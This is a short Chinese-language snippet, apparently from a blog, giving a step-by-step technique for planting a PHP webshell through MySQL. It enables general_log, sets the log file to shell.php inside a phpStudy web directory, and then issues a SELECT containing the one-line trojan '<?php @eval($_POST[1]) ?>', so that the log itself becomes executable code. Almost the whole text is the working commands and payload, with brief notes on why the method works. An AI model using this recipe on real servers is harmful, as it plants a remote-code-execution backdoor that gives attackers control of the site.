开启SQL日志功能 SET global general_log="ON";
设置日志文件地址,这个地址需要设置网站目录里的地址,因为要获取权限得通过容器解释代码才行,而网站目录地址则可以通过刚才的探针获得
SET global general_log_file='D:/phpStudy/WWW/shell.php';
- 向日志文件提交一句话木马,因为SQL日志文件会记录SQL的所有操作,而且不会转义,所以直接能写一句话木马到日志里面去
|
1
|
select '<?php @eval($_POST[1]) ?>'; |
浙公网安备 33010602011771号